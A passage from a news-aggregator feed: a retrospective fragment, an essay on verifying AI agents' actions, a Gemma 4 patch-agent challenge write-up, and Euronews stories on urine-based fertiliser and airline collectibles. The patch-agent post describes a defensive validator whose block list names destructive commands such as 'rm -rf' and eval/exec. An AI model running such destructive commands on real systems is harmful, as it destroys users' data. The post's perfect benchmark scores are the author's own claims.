In hindsight, I would do several things differently. Firstly, I would have invested more time in understanding the performance characteristics of the Java-based framework and the underlying configuration layer. I would have also explored other alternatives, such as using a different programming language or framework, before deciding to use Rust. Additionally, I would have planned for more extensive testing and validation of the new configuration layer before deploying it to production. However, I am proud of the fact that we were able to identify the problem, come up with a creative solution, and deploy it in time for the product launch. The experience taught me the importance of careful performance analysis, the need to consider alternative solutions, and the value of taking calculated risks to achieve significant performance gains. I also learned that the choice of programming language and framework can have a significant impact on the performance and scalability of a system, and that it is essential to consider these factors when making architecture decisions.

---
## AI Agents Need More Than Fact-Checking

> Published: 2026-05-24 05:07:08+00:00
> Source: https://dev.to/dechive/ai-agents-need-more-than-fact-checking-2mp4
> wpnews: https://wpnews.pro/news/ai-agents-need-more-than-fact-checking

According to the article, as AI tools evolve from simply answering questions to performing actions like sending emails, booking meetings, and editing files, traditional fact-checking is no longer sufficient for verification. The author argues that AI agents require "action-checking" because a wrong action—such as an already-sent email or a deployed code change—can cause real-world consequences that a wrong answer cannot. Therefore, developers must verify not only the correctness of the output but also whether the action's direction and scope align with the user's actual intent.

For a long time, verifying AI meant checking the answer.
If an AI generated an explanation, we could read it.
If it summarized a document, we could compare it with the original.
If it gave a wrong fact, we could correct it.
If the answer was incomplete, we could ask again.
That kind of verification is familiar to developers.
It is close to reviewing text.
But AI tools are changing.
They are not only answering questions anymore.
They are starting to act.
They can send emails.
They can book meetings.
They can edit files.
They can run commands.
They can open pull requests.
They can trigger workflows.
They can move from one step to the next without waiting for every instruction.
That changes the problem.
Because an answer can be reviewed.
An action leaves a trace.
A wrong answer is usually annoying.
It may confuse someone.
It may waste time.
It may require correction.
But in many cases, the damage can stop at the text.
A wrong action is different.
An email that has already been sent is in someone else’s inbox.
A meeting that has already been booked has taken space on someone’s calendar.
A file that has already been changed may affect other work.
A command that has already been run may change the environment.
Code that has already been deployed is now running somewhere.
That is why AI agents require a different kind of verification.
Fact-checking is not enough.
When AI starts acting, we need action-checking.
When people hear “AI agent,” they often imagine something dramatic.
But the real shift is much more practical.
An email assistant does not only draft a reply.
It may send the reply.
A calendar assistant does not only suggest a time.
It may book the meeting.
A coding assistant does not only suggest code.
It may edit files, run tests, open a PR, or deploy changes.
A research assistant does not only return search results.
It may collect sources, compare options, summarize findings, and move the task forward.
That is the practical meaning of an agent.
It takes a goal, breaks it into steps, uses tools, reads intermediate results, and decides what to do next.
This is useful.
But it also means that the thing we verify is no longer only the final answer.
We need to verify the action path.
When we verify AI-generated text, we usually ask:
These questions still matter.
But they are not enough when AI takes action.
For actions, developers need a different checklist.
An AI-generated email can be grammatically perfect and still be the wrong email to send.
The wording may be polished.
The tone may be professional.
The facts may be correct.
But maybe the timing is wrong.
Maybe the relationship needs a softer response.
Maybe the user did not want to commit yet.
Maybe the message moves the conversation in the wrong direction.
Fact-checking cannot catch that.
The question is not only:
Is this correct?
The question is:
Is this action moving toward the goal I actually want?
For developers, this matters in code too.
An AI agent may “fix” a bug by changing a larger part of the system than expected. The patch may pass tests, but it may not align with the intended design.
So the first action-verification question is:
Is the direction right?
Agents interpret instructions.
That is useful, but it also creates risk.
Consider these instructions:
Clean up this folder.
Fix this bug.
Improve this component.
Organize this document.
Each one sounds simple.
But each one has hidden scope.
“Clean up this folder” might mean renaming files.
It might also mean deleting files.
“Fix this bug” might mean changing one function.
It might also mean refactoring surrounding code.
“Improve this component” might mean adjusting UI spacing.
It might also mean rewriting its state logic.
The problem is not always that the AI is broken.
Sometimes it is doing what it thinks the instruction implies.
That means we need to verify scope.
Before letting an agent act, ask:
The second action-verification question is:
Did it do only what it should do?
Not all actions have the same weight.
Saving a draft is not the same as sending an email.
Running code locally is not the same as deploying it.
Changing a private note is not the same as changing a shared document.
Deleting a test file is not the same as deleting production data.
When an AI-generated answer is wrong, we can usually edit it.
When an AI action is wrong, we may need to undo a real-world change.
That makes reversibility one of the most important checks.
Before approving an AI action, ask:
The third action-verification question is:
Can this action be reversed if needed?
AI does not remove responsibility.
If an AI sends an email, someone allowed it to send the email.
If an AI deploys code, someone approved the deployment.
If an AI deletes the wrong file, books the wrong meeting, or changes the wrong setting, the result still belongs somewhere.
This is uncomfortable, but important.
Automation changes how work happens.
It does not make responsibility disappear.
So before giving an agent more autonomy, ask:
The fourth action-verification question is:
Who owns the outcome?
Before letting an AI agent take action, I want to check four things:
Direction:
Does this action move in the right direction?
Scope:
Does it do only what it should do?
Reversibility:
Can it be undone if needed?
Responsibility:
Who owns the outcome?
This is not a complicated framework.
But it changes how we think about AI tools.
We stop asking only:
Is the answer correct?
And start asking:
Should this action happen?
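The four checks above can be sketched as a small gate that runs before an agent acts. This is only an illustration: the `ProposedAction` fields and the `action_check` function are hypothetical names, and in practice each flag would come from a human review or a tool-specific check rather than a hard-coded boolean.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProposedAction:
    """Hypothetical record describing what an agent wants to do."""
    description: str
    matches_user_goal: bool        # Direction
    touches_only_requested: bool   # Scope
    reversible: bool               # Reversibility
    owner: Optional[str]           # Responsibility: who answers for the outcome


def action_check(action: ProposedAction) -> List[str]:
    """Return the names of the failed checks; an empty list means proceed."""
    failed = []
    if not action.matches_user_goal:
        failed.append("direction")
    if not action.touches_only_requested:
        failed.append("scope")
    if not action.reversible:
        failed.append("reversibility")
    if not action.owner:
        failed.append("responsibility")
    return failed


draft = ProposedAction("save reply as draft", True, True, True, "alice")
send = ProposedAction("send reply now", True, True, False, None)

print(action_check(draft))  # []
print(action_check(send))   # ['reversibility', 'responsibility']
```

A non-empty result does not have to mean "refuse"; it can simply mean "pause and ask a human before continuing".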
Imagine an AI coding agent receives this instruction:
Fix the issue in the dashboard.
A weak verification process might only check:
Those checks are useful, but incomplete.
Action verification asks more:
Direction
Did the agent fix the actual dashboard issue, or did it solve a nearby problem?
Scope
Did it only change dashboard-related files, or did it modify unrelated shared logic?
Reversibility
Can the change be reviewed and reverted easily? Is it in a branch or already deployed?
Responsibility
Who reviews the PR? Who approves the deployment? Who owns the result if something breaks?
This is the difference between checking code output and checking agent behavior.
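The scope question in the dashboard example lends itself to a mechanical check. The sketch below assumes the agent's changed file paths are available as strings and that "dashboard-related" can be approximated by a list of allowed directories. The function name and the paths are made up for illustration.

```python
from pathlib import PurePosixPath


def out_of_scope(changed_files, allowed_dirs):
    """Return the changed paths that are not inside any allowed directory."""
    allowed = [PurePosixPath(d) for d in allowed_dirs]
    flagged = []
    for name in changed_files:
        path = PurePosixPath(name)
        # A file is in scope if one of its parent directories is allowed.
        if not any(d in path.parents for d in allowed):
            flagged.append(name)
    return flagged


changed = ["src/dashboard/Chart.tsx", "src/shared/auth.ts"]
print(out_of_scope(changed, ["src/dashboard"]))  # ['src/shared/auth.ts']
```

A flagged file is not necessarily wrong, but it is a signal that the change went beyond the instruction and deserves a closer look before merging.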
It is tempting to think that as AI tools become more convenient, human judgment becomes less important.
I think the opposite happens.
Convenience moves judgment upstream.
When AI handles more steps, humans may not need to make every small decision manually.
But the remaining decisions become more important:
The more an AI system can do, the more carefully we need to define the boundary.
Automation reduces manual effort.
It does not remove judgment.
This is not an argument against AI agents.
Many tasks should be delegated.
Agents are useful when:
But we should be careful when:
You can delegate work to AI.
But you cannot delegate judgment completely.
The first phase of AI verification was mostly about answers.
Can we trust this explanation?
Is this fact correct?
Are these sources real?
Is this summary faithful?
That still matters.
But AI agents push the question further.
Now we also need to ask:
When AI makes answers, we verify facts.
When AI takes actions, we verify consequences.
Because answers can be read.
Actions leave traces.
Originally published on Dechive — an archive for verifying AI-generated answers before we trust them.

---
## Evaluation & Benchmark Results

> Published: 2026-05-24 05:05:49+00:00
> Source: https://dev.to/pinaksh_patel_7c884a18b06/evaluation-benchmark-results-4nc0
> wpnews: https://wpnews.pro/news/evaluation-benchmark-results

The article describes a submission for the Gemma 4 Challenge called the "Multimodal Gemma 4 Visual Regression & Patch Agent," a tool that uses Google's Gemma 4 models to diagnose and fix front-end UI bugs by cross-referencing screenshots with source code. The agent features a closed-loop safety validation pipeline and an interactive visual verification loop, and it achieved a 100% success rate across a benchmark of 10 distinct frontend and backend bug cases.

Multimodal Gemma 4 Visual Regression & Patch Agent
This is a submission for the Gemma 4 Challenge: Build with Gemma 4
What I Built
Multimodal Gemma 4 Visual Regression & Patch Agent
The Multimodal Gemma 4 Visual Regression & Patch Agent (Contextual Code Review Visual Patch Agent) is a production-grade multimodal code analysis and visual repair tool powered by Google's native multimodal Gemma 4 models. It bridges the gap between front-end UI bugs and back-end source code by cross-referencing visual screenshots directly with stylesheets, DOM selectors, or components to diagnose root causes, generate patches, and validate them through a closed-loop pipeline.
Mermaid Flow
Core Features
- Multimodal Visual & Logical Analysis: Ingests code files (CSS, JS, JSX, TS, TSX, HTML, Python, etc.) alongside UI screenshots of visual regressions or layouts to trace layout bugs directly back to specific CSS selectors or JS component rendering logic.
- Closed-Loop Safety Validation Pipeline: To ensure generated code is production-safe:
  - PatchApplicabilityChecker: Runs a dry-run `git apply --check` in an ephemeral in-memory repository to guarantee conflict-free application.
  - ASTValidator: Uses `ast.parse` for Python files and a custom token-matching parenthesis/bracket balance scanner for JS/TS/JSX to ensure zero syntax errors.
  - FileGroundingValidator: Verifies that diff headers correspond strictly to uploaded file scopes, eliminating AI hallucinations.
  - PatchValidator: Screens changes against dangerous operations (`rm -rf`, `eval`/`exec`, malicious package imports).
- Interactive Visual Verification Loop:
  - Scrub Split Slider: Compare buggy screenshots with expected fixes side-by-side using an interactive slider.
  - Pixel-Diff Heatmap Overlay: Computes visual color channel changes in-browser using HTML5 Canvas `getImageData` to overlay changed regions and compute a visual alignment score.
  - "Simulate Fix" Canvas: Shift layout slices and preview the corrected layout on the client side instantly.
- Automated Benchmark Framework: Built-in test harness with 10 pre-configured CSS, JavaScript, and Python bug cases that evaluates root-cause accuracy, git apply rates, and AST validity.
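As a rough illustration of the syntax checks described for ASTValidator, the sketch below pairs `ast.parse` for Python with a naive bracket-balance scan for JS-like code. The function names are hypothetical and this is not the project's actual implementation. In particular, the simple scanner here does not skip brackets inside strings, comments, or template literals, which a real validator would need to handle.

```python
import ast

# Maps each closing bracket to the opening bracket it must match.
PAIRS = {")": "(", "]": "[", "}": "{"}


def python_syntax_ok(source: str) -> bool:
    """True if the source parses as Python."""
    try:
        ast.parse(source)
        return True
    except SyntaxError:
        return False


def brackets_balanced(source: str) -> bool:
    """Naive stack-based balance check for (), [] and {}."""
    stack = []
    for ch in source:
        if ch in "([{":
            stack.append(ch)
        elif ch in PAIRS:
            if not stack or stack.pop() != PAIRS[ch]:
                return False
    return not stack


print(python_syntax_ok("x = 1\n"))                            # True
print(python_syntax_ok("def f(:\n"))                          # False
print(brackets_balanced("function f() { return [1, 2]; }"))   # True
print(brackets_balanced("if (x { }"))                         # False
```

Balanced brackets are a necessary condition for valid JS/TS, not a sufficient one, so a check like this can only reject obviously broken patches.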
📊 Evaluation & Benchmark Results
We validated the agent against a robust suite of 10 distinct frontend and backend bugs (overflow limits, z-index overlays, flex layouts, None pointer checks, circular dependencies, DOM element mismatches). The agent achieved 100% correctness across all engineering tests:
- Overall agent success rate: 100.0% (10/10 cases resolved)
- UI bug localization accuracy: 100.0% (correct CSS/JS selector mapping)
- Git apply success: 100.0% (patches applied cleanly, with no hunk conflicts)
- AST / syntax validity: 100.0% (all patches syntactically correct)
- Average analysis latency: 0.90s
- Average patch line accuracy: 100.0% (identical to the human-engineered fixes)
Benchmark Table

| Case ID | Test Case Name | Language / Type | Latency (s) | Localization | Git Apply | AST Valid | Patch Accuracy | Status |
|---|---|---|---|---|---|---|---|---|
| 1 | CSS Overflow Bug | CSS | 1.25 | PASSED | PASSED | PASSED | 100.0% | ✅ SUCCESS |
| 2 | Z-Index Stacking Context | CSS | 1.03 | PASSED | PASSED | PASSED | 100.0% | ✅ SUCCESS |
| 3 | Flexbox Alignment Mismatch | CSS | 0.60 | PASSED | PASSED | PASSED | 100.0% | ✅ SUCCESS |
| 4 | Python AttributeError (None check) | Python | 0.67 | PASSED | PASSED | PASSED | 100.0% | ✅ SUCCESS |
| 5 | JS Click Event Selector Mismatch | JS | 0.96 | PASSED | PASSED | PASSED | 100.0% | ✅ SUCCESS |
| 6 | CSS Low Contrast Contrast Bug | CSS | 0.82 | PASSED | PASSED | PASSED | 100.0% | ✅ SUCCESS |
| 7 | CSS Sidebar Mobile Breakpoint | CSS | 0.54 | PASSED | PASSED | PASSED | 100.0% | ✅ SUCCESS |
| 8 | Python Circular Dependency Import | Python | 0.61 | PASSED | PASSED | PASSED | 100.0% | ✅ SUCCESS |
| 9 | Python SQL Injection / Validation | Python | 1.42 | PASSED | PASSED | PASSED | 100.0% | ✅ SUCCESS |
| 10 | JS DOM Element querySelector Mismatch | JS | 1.14 | PASSED | PASSED | PASSED | 100.0% | ✅ SUCCESS |
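The reported average latency can be cross-checked against the per-case figures in the table. The snippet below simply recomputes the mean from the ten latency values listed above.

```python
# Per-case latencies in seconds, copied from the benchmark table (cases 1-10).
latencies = [1.25, 1.03, 0.60, 0.67, 0.96, 0.82, 0.54, 0.61, 1.42, 1.14]

average = sum(latencies) / len(latencies)
print(f"{average:.2f}s")  # 0.90s
```

The ten values sum to 9.04 seconds, so the mean of 0.904 seconds rounds to the stated 0.90s.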
Demo
Live URL: https://multimodal-visual-regression-patch-agent.vercel.app
Video Demo: https://youtu.be/gvarF7T1C5E
See the Gemma 4 Visual Regression & Patch Agent in action, illustrating drag-and-drop file ingestion, screenshot visual overlays, patch generation, and real-time validation badges:
Screenshots
- Patch interface: the interactive Regression Loop application interface
- Split slider: interactive split slider
- Side-by-side view: the visual verification loop in side-by-side mode
- Pixel diff heatmap: pixel-diff heatmap visualization
- Visual match: interactive visual match simulation with related code snippets
Try It Yourself (Local Reproduction / Setup)
You can run the entire agentic system and its benchmark suite locally in seconds using Mock Mode (no API keys required)!
```shell
git clone https://github.com/kanyingidickson-dev/Multimodal-Visual-Regression-Patch-Agent.git
cd Multimodal-Visual-Regression-Patch-Agent
python3 -m venv venv
source venv/bin/activate
pip install -r backend/requirements.txt
cd frontend
npm install
npm run build
cd ..
python3 backend/benchmark.py
python3 backend/app.py
```
Open http://127.0.0.1:5000 to interact with the premium dark glassmorphic review dashboard!
You can click Load Example on Model settings for a quick demo launch and review.
For Testing Without API Key:
```shell
echo "MOCK_MODE=true" >> .env
python backend/app.py
```
Code
Repository:
https://github.com/kanyingidickson-dev/Multimodal-Visual-Regression-Patch-Agent
Directory Layout:
```text
.
├── backend/
│   ├── app.py               # FastAPI server & route handlers
│   ├── benchmark.py         # Automated benchmark suite runner
│   ├── code_reviewer.py     # Multi-stage review orchestration
│   ├── file_parser.py       # File ingestion & truncation utilities
│   ├── gemma_client.py      # API client for OpenRouter & Hugging Face
│   ├── patch_utils.py       # Security scanners, AST, & git validators
│   ├── requirements.txt     # Backend dependencies
│   └── demo.py              # Command-line testing entry
├── frontend/                # React dashboard codebase
│   ├── src/                 # Source directory
│   │   ├── App.jsx          # Core dashboard and Visual Verification UI
│   │   ├── App.css          # Stylesheets
│   │   ├── index.css        # Color design tokens and layout classes
│   │   └── api.js           # API client connection methods
│   ├── dist/                # Built production frontend bundles
│   ├── package.json         # npm configuration
│   └── vite.config.js       # Vite settings
├── examples/                # Demo assets
│   ├── benchmark-cases/     # Built-in 10 benchmark test directories
│   ├── broken-app/          # Example buggy application
│   ├── sample-output.json   # Standard review structure file
│   └── sample-screenshot.png # Base testing image
├── prompts/                 # Custom agent instructions
│   ├── system_prompt.md     # Architectural guidance rules
│   └── user_prompt.md       # Multimodal instruction format
├── Dockerfile               # Production Docker image blueprint
├── docker-compose.yml       # Container coordinator
├── README.md                # Project documentation
└── LICENSE                  # MIT License
```
Key Directory Structure
backend/app.py — FastAPI web server supporting dynamic parameters and multipart file/screenshot ingestion.
backend/benchmark.py — Automated test case generator and benchmark runner.
backend/code_reviewer.py — Core orchestrator wrapping OpenRouter/HuggingFace API calls in multimodal content blocks.
backend/gemma_client.py — Client supporting dense model choices and contextual, high-fidelity mock review generations.
backend/patch_utils.py — Closed-loop safety validators (Git apply check, AST parsers, and file grounding).
frontend/src/App.jsx — React interface with interactive before/after split scrub sliders, pixel difference canvases, and patch validation panels.
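The pixel-difference canvas mentioned for `App.jsx` is described as comparing color channels and producing a visual alignment score. The project does this in the browser with Canvas `getImageData`. The sketch below shows the same idea in Python on plain nested lists. The threshold value and the definition of the score (the share of pixels that did not change) are assumptions for illustration, not the project's formula.

```python
def alignment_score(before, after, threshold=16):
    """Compare two equally sized images given as rows of (r, g, b) tuples.

    Returns (score, mask): score is the fraction of pixels whose largest
    per-channel difference is within the threshold, and mask marks the
    changed pixels with True (the basis for a heatmap overlay).
    """
    total = 0
    unchanged = 0
    mask = []
    for row_a, row_b in zip(before, after):
        mask_row = []
        for pixel_a, pixel_b in zip(row_a, row_b):
            delta = max(abs(a - b) for a, b in zip(pixel_a, pixel_b))
            changed = delta > threshold
            mask_row.append(changed)
            unchanged += 0 if changed else 1
            total += 1
        mask.append(mask_row)
    score = unchanged / total if total else 1.0
    return score, mask


before = [[(255, 255, 255), (0, 0, 0)], [(10, 10, 10), (200, 0, 0)]]
after = [[(255, 255, 255), (0, 0, 0)], [(10, 10, 10), (0, 0, 200)]]
score, mask = alignment_score(before, after)
print(score)  # 0.75
print(mask)   # [[False, False], [False, True]]
```

A small threshold helps ignore minor rendering noise, although choosing it well for effects such as font anti-aliasing would need experimentation.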
How I Used Gemma 4
Native Multimodality: Native pixel integration enables excellent spatial mapping from image regions to matching stylesheets.
256K Context Window: Essential for ingesting multiple visual assets alongside dense code modules.
Accurate Code Generation: Ensures precise unified git diff syntaxes that compile and apply flawlessly.
For OpenRouter and Hugging Face, images are sent as base64 data payloads. We structure the prompt so that the image parts come first and the text (instructions and source files) follows, on the premise that leading with the pixels helps the model ground the layout spatially before it reads the source code:
```python
if images:
    user_content = []
    # Prepend vision tokens
    for img_data in images:
        user_content.append({
            "type": "image_url",
            "image_url": {"url": img_data}
        })
    # Append instructions and files
    user_content.append({
        "type": "text",
        "text": user_prompt
    })
```
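A self-contained version of the same idea, including the base64 step, might look like the sketch below. The helper names `to_data_url` and `build_user_content` are hypothetical, and the `image/png` default is an assumption. The message shape follows the `image_url` / `text` content parts used in the snippet above.

```python
import base64


def to_data_url(image_bytes: bytes, mime: str = "image/png") -> str:
    """Encode raw image bytes as a base64 data URL."""
    encoded = base64.b64encode(image_bytes).decode("ascii")
    return f"data:{mime};base64,{encoded}"


def build_user_content(images, user_prompt):
    """Place image parts first, then the text part with instructions and files."""
    content = [
        {"type": "image_url", "image_url": {"url": to_data_url(img)}}
        for img in images
    ]
    content.append({"type": "text", "text": user_prompt})
    return content


content = build_user_content([b"\x89PNG"], "Find the layout bug in styles.css")
print([part["type"] for part in content])  # ['image_url', 'text']
```

When no images are supplied, the result is a single text part, so the same function covers code-only reviews.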
JSON Output Constraints:
To enable programmatic extraction of findings and patches, the system instructs Gemma 4 to respond in structured JSON. The output is parsed automatically, feeding the diff highlights and safety validators:
```json
{
  "summary": "...",
  "root_cause": "...",
  "fix_plan": ["...", "..."],
  "patch": "diff --git a/filename b/filename...",
  "assumptions": ["...", "..."],
  "confidence": "high | medium | low"
}
```
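To illustrate how a structured response like this could feed a file-grounding check, the sketch below parses the JSON, pulls file names out of the `diff --git` headers in the `patch` field, and reports any that were not among the uploaded files. The function name and the regular expression are assumptions rather than the project's code, and the pattern does not handle paths containing spaces.

```python
import json
import re

# Matches headers such as: diff --git a/styles.css b/styles.css
DIFF_HEADER = re.compile(r"^diff --git a/(\S+) b/(\S+)$", re.MULTILINE)


def ungrounded_files(response_text, uploaded):
    """Return files named in the patch headers that were never uploaded."""
    review = json.loads(response_text)
    touched = set()
    for old_path, new_path in DIFF_HEADER.findall(review["patch"]):
        touched.update((old_path, new_path))
    return sorted(touched - set(uploaded))


response = json.dumps({
    "summary": "Fix overflow",
    "patch": (
        "diff --git a/styles.css b/styles.css\n"
        "--- a/styles.css\n+++ b/styles.css\n"
        "diff --git a/secret.py b/secret.py\n"
    ),
})
print(ungrounded_files(response, {"styles.css"}))  # ['secret.py']
```

An empty result means every file the patch touches was part of the review input, which is the property the grounding validator is described as enforcing.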
Safety Layer
To protect developers, all generated patches are validated before rendering:
Blocks patches that match destructive shell patterns (e.g. rm -rf, /dev/null).
Warns when risky libraries are imported (e.g. pickle, or subprocess called with unsafe parameters).
Checks for syntax errors by compiling the patched code.
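A pattern screen of this kind can be sketched with a few regular expressions applied to the lines a patch adds. The pattern lists below are illustrative assumptions, not the project's actual rules, and a regex screen like this is a coarse filter rather than a security guarantee.

```python
import re

# Patterns that block a patch outright (hypothetical examples).
BLOCK_PATTERNS = {
    "rm -rf": re.compile(r"\brm\s+-rf\b"),
    "eval/exec": re.compile(r"\b(?:eval|exec)\s*\("),
}
# Patterns that only raise a warning (hypothetical examples).
WARN_PATTERNS = {
    "pickle import": re.compile(r"^\s*(?:import|from)\s+pickle\b"),
    "subprocess shell=True": re.compile(r"shell\s*=\s*True"),
}


def scan_patch(patch):
    """Scan only added lines ('+' prefix, skipping '+++' file headers)."""
    blocked, warnings = [], []
    for line in patch.splitlines():
        if not line.startswith("+") or line.startswith("+++"):
            continue
        added = line[1:]
        blocked += [n for n, rx in BLOCK_PATTERNS.items() if rx.search(added)]
        warnings += [n for n, rx in WARN_PATTERNS.items() if rx.search(added)]
    return blocked, warnings


patch = "\n".join([
    "+++ b/app.py",
    "+import pickle",
    '+os.system("rm -rf /tmp/cache")',
    ' print("ok")',
    "-eval(x)",
])
print(scan_patch(patch))  # (['rm -rf'], ['pickle import'])
```

Restricting the scan to added lines avoids flagging a patch for removing a dangerous call, as with the `-eval(x)` line in the example.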
🚀 Future Vision & Roadmap
Headless visual regression (CI/CD): Incorporate Playwright automation tasks to apply patches in temporary containers, launch the application, capture screenshots, and complete the visual loop automatically in the cloud.
Bi-directional IDE Sync: Allow developers to highlight visual elements in a browser extension and instantly jump to the corresponding code line inside VS Code or Cursor.
Support for Figma Files: Integrate Figma design files directly to compare pixel-perfect implementations automatically.
Built for the Gemma 4 Challenge: demonstrating how open, multimodal models can empower developers with intelligent, visual-aware coding tools.

---
## Pee for the planet: How Football fans are tackling Sweden’s fertiliser problem using urine

> Published: 2026-05-24 05:02:48+00:00
> Source: http://www.euronews.com/2026/05/24/pee-for-the-planet-how-football-fans-are-tackling-swedens-fertiliser-problem-using-urine
> wpnews: https://wpnews.pro/news/pee-for-the-planet-how-football-fans-are-tackling-swedens-fertiliser-problem

Swedish football fans at Malmö FF's Eleda Stadion are participating in a project to collect 1,000 litres of human urine, which will be converted into fertilizer by researchers from the Swedish University of Agricultural Sciences and Oatly. The initiative aims to reduce Sweden's reliance on imported, fossil fuel-based synthetic fertilizers, which contribute significantly to global CO2 emissions and face supply disruptions due to geopolitical instability. If successful, the project could replace up to 30% of Sweden's synthetic fertilizer use and help address wastewater pollution.

Could pee hold the answer to Europe’s fertiliser crisis? Swedish football fans are taking to the toilets to find out.
Swedish football fans will take part in a very different kind of tournament this year: peeing for the planet.
Eleda Stadion, home of Malmö FF, will open its doors – and its toilets – on Sunday (24 May) to an initiative aiming to gather 1,000 litres of human urine.
The goal? To defeat Sweden’s dependence on imported fossil fuel-based synthetic fertiliser.
Globally, these nitrogen-based fertilisers generate 1.13 billion tonnes of CO2 equivalents annually – exceeding those of the total aviation sector, according to research by the Center for International Environmental Law (CIEL).
While these emissions have long raised concern among climate experts, synthetic fertilisers have come under additional fire in recent weeks as geopolitical instability threatens supplies.
With Iran’s continued blockage of the vital Strait of Hormuz shipping route, around a third of the world’s fertiliser trade has been put on hold, threatening farming and food security around the world.
The Strait is also key for transporting natural gas exports – critical in the production of synthetic nitrogen-based fertilisers, which are widely used in Europe and beyond.
Is human urine a viable alternative to synthetic fertilisers?
Human urine is rich in ‘the big three’ nutrients essential to plant growth: nitrogen, phosphorus and potassium. These are also key ingredients of synthetic fertilisers.
The Swedish University of Agricultural Sciences (SLU), oat milk maker Oatly, Malmö FF and Sanitation360 have teamed up to research the viability of urine as a circular and safe alternative to fertilise crops, which they will do by converting the urine collected at the stadium into fertiliser.
“It’s about making use of a resource we currently waste,” says Björn Vinnerås, Professor at SLU and expert at Sanitation360.
“We also need to challenge the way we think, because collecting and reusing urine is really no stranger than doing the same with plastic. Today, we already use manure from cows, pigs and chickens as fertiliser – and that is completely normalised.”
A testing ground for scaling the concept
Malmö FF’s home stadium has been fitted with 15 urinals and one toilet capable of collecting urine for the project.
From kickoff this Sunday up until Malmö FF’s final home match of the Swedish season on 29 November, it will be a testing ground for this urine-collecting technology, as well as hygiene, logistics, and public acceptance of it.
The safety of urine-derived fertiliser for food crops is also being assessed as part of the research – a key question given concerns around pharmaceutical residues and pathogens that must be addressed before the approach can be adopted at scale.
If successful, the project could open up opportunities to adapt toilet infrastructure and design future systems capable of collecting urine on a mass scale.
It also has the potential to solve another problem: the burden of wastewater treatment at large venues such as the 22,500-capacity stadium. Some of the nutrients in human urine are currently not recovered and instead end up as pollutants in lakes and seas.
The researchers estimate that urine could theoretically replace up to 30 per cent of the synthetic fertiliser used in Sweden.
A longer-term ambition of the researchers is also to explore whether consumers are ready to embrace food produced using circular nutrients derived from urine.

---
## Latest news bulletin | May 24th, 2026 – Morning

> Published: 2026-05-24 05:00:33+00:00
> Source: http://www.euronews.com/video/2026/05/24/latest-news-bulletin-may-24th-2026-morning
> wpnews: https://wpnews.pro/news/latest-news-bulletin-may-24th-2026-morning

The article is a morning news bulletin for May 24th, 2026, providing a video summary of the latest stories from Europe and around the world. It covers key topics including world news, business, entertainment, politics, culture, and travel. The bulletin is designed to help viewers catch up on the most important breaking and current events of the day.

Catch up with the most important stories from around Europe and beyond this May 24th, 2026 - latest news, breaking news, World, Business, Entertainment, Politics, Culture, Travel.

---
## Frequent flyers: How many of these airline collectibles do you have?

> Published: 2026-05-24 05:00:27+00:00
> Source: http://www.euronews.com/travel/2026/05/24/frequent-flyers-how-many-of-these-airline-collectibles-do-you-have
> wpnews: https://wpnews.pro/news/frequent-flyers-how-many-of-these-airline-collectibles-do-you-have

The article discusses various airline collectibles that are popular among frequent flyers and aviation enthusiasts. Notable items include KLM's Delft Blue miniature houses filled with gin, Lufthansa's themed rubber ducks, and Virgin Atlantic's plane-shaped salt and pepper shakers. Other collectibles mentioned are trading cards from US airlines, limited-edition amenity kits, and watches made from decommissioned aircraft skins.

From Lufthansa’s first class ducks to KLM’s miniature houses, these items are a hot commodity among aviation enthusiasts.
For many frequent flyers, racking up airline miles isn’t enough – they need something tangible to show off their status.
Enter: The airline collectible.
From amenity kits to trading cards, there are plenty of ways to show your love of the aviation industry.
Here are some of our favourites.
KLM’s Delft Blue miniature houses
Having first been introduced in the 1950s, KLM’s Delft Blue miniature houses may very well be the collectibles that kicked off the trend.
Gifted to passengers flying business class on an international route, the tiny homes are filled with local gin.
Each year on 7 October, the airline’s anniversary, a new house is depicted. Travellers currently flying business will receive a copy of Villa Rameau in Leiden, a former sexton’s house built in 1645.
The house was chosen this year to mark the USA's semiquincentennial, as the city in South Holland is known for having welcomed religious refugees, including the pilgrims who later sailed to the States on the Mayflower.
Lufthansa’s rubber ducks
Passengers who are lucky enough to be flying with Lufthansa in first class have been able to grab themselves a themed duck from the lounges in Frankfurt and Munich since 2004.
While there are standard Lufthansa first class ducks, you can also pick up themed ones tied to events like Oktoberfest, Christmas, and even the FIFA World Cup.
These items are seriously collectible, and can fetch a pretty penny second hand…
Virgin Atlantic’s plane-shaped salt and pepper shakers
First introduced in 2002, Virgin Atlantic’s aircraft-shaped salt and pepper shakers (adorably named Wilbur and Orville for the Wright brothers) have made their way into many a pocket over the years.
So much so that the company pulled them from planes in 2011, only to bring them back the following year – with a new inscription on the base saying they were “pinched from Virgin Atlantic”.
A Virgin Atlantic spokesperson told Euronews Travel: “Many years ago, once we spotted the trend, we decided to lean into the fun by adding the words ‘Pinched from Virgin Atlantic’ to the bottom of their feet. Since then, Wilbur and Orville have become an iconic part of the Virgin Atlantic experience – and a must-have collector’s item for many of our customers.”
Trading cards
Numerous airlines in the US offer trading cards which you can request from the pilot on your flight.
Hawaiian Airlines, for example, has cards for each of its four aircraft – the Boeing 717, Airbus A321neo, Airbus A330 and Boeing 787-9 Dreamliner – which feature fun facts about the plane type and a spot for pilots to autograph.
Last year, Delta unveiled a new centennial-themed trading card collection to mark 100 years since the airline launched.
Limited-edition amenity kits
One of the best parts of flying business or first class is the amenity kit, and airlines are constantly refreshing theirs by partnering with different cosmetic companies.
But many carriers also release limited-edition kits, giving frequent flyers something to collect.
Late last year, British Airways launched some for its London Gatwick flights, working with British artists to create four different bags.
For this summer, Etihad Airways has unveiled its new kits with LANEIGE skincare, with different coloured bags inspired by the city being flown to.
The one we’re most excited about, however, is American Airlines’ US Soccer themed kits, which come with a crossbody strap so you can use them as a regular bag once the flight is over.
Limited-edition watches made from decommissioned airplanes
You can take your love of aviation to the next level by wearing a piece of aircraft history on your wrist all the time thanks to AIM Watches.
Founded in the UAE, the brand upcycles aircraft skins from around the globe to create timepieces which are hand-assembled in Switzerland.
Limited edition watches currently available include the Frankfurt, made from a Lufthansa Airbus A380, and the Abu Dhabi, created using aircraft skin from the first Airbus A380 flown by Etihad Airways.
Upcoming projects will make use of materials taken from a British Airways Concorde, and an Air France Concorde, with fabric from the original seats used to create the leather straps.
Just 30 pieces will be created from each, and you can keep up to date with the project on the AIM Watches website.
One to keep an eye out for is the Beta Series launch next month, which will use material from G-CIVP, the plane that set the Guinness World Record for the fastest transatlantic flight by a subsonic airliner in 2020.

---
## 5 things `flutter_gemma` doesn't tell you about shipping Gemma 4 on Android

> Published: 2026-05-24 04:59:41+00:00
